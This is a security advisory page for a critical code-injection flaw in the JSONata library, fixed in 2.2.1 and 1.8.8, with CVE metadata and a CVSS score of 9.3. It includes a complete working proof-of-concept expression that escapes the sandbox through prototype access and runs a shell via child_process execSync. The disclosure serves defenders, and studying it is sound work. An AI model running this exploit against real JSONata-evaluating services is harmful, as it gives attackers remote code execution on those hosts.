CVE-2026-77415

ADVISORY - github

Summary

Before JSONata 2.2.1 and 1.8.8 it was possible to execute arbitrary code with crafted expressions, due to:

  • overwriting $clone allowing mutation of objects via transforms (see evaluateTransformExpression)
  • it being possible to destruct jsonata functions/lambdas (e.g. $merge.*)
  • applyProcedure using proc.arguments.forEach and not Array.prototype.forEach

Which could be chained to execute arbitrary code.

This was fixed with:

Which are included in the 2.2.1 release. Fixes were then back-ported to the 1.8.8 release.

PoC

import jsonata from "jsonata";

const expression = jsonata(`
(
    $obj := {};
    $clone := function($o) { $o };
    $m := ($merge.*)[1];

    $fn := function($a) {
        (
            $a({"value":"lg"},"__lookupGetter__");
            $a({"value":"x"},"x");
        )
    };

    $nop := function() { $ };

    $capture := function($val) {
        $obj ~> | $obj | {"x": 1, "y": 1, "lg":$lg} |
    };

    $ ~> | $ | $m([$nop,{"_jsonata_lambda":false}])|;
    $ ~> | $ | {"arguments":{"forEach": $spread($fn)}}|;
    $ ~> | $ | {"body":$m([$capture,{"_jsonata_lambda":false}]).body}|;
    $func := $m([$,{"_jsonata_lambda":true}]);
    $func();

    $gP := $obj.lg("__proto__");

    $afn:=$spread($fn);
    $afn{"x":$gP().constructor("return process.getBuiltinModule('child_process').execSync('sh',{stdio:'inherit'})")()};
)
`);

await expression.evaluate({});

References

Common Weakness Enumeration (CWE)

ADVISORY - nist

Improper Control of Generation of Code ('Code Injection')

ADVISORY - github

Improper Control of Generation of Code ('Code Injection')


NIST

CREATED

UPDATED

EXPLOITABILITY SCORE

-

EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)

CVSS SCORE

9.3critical

GitHub

CREATED

UPDATED

EXPLOITABILITY SCORE

-

EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)

CVSS SCORE

9.3critical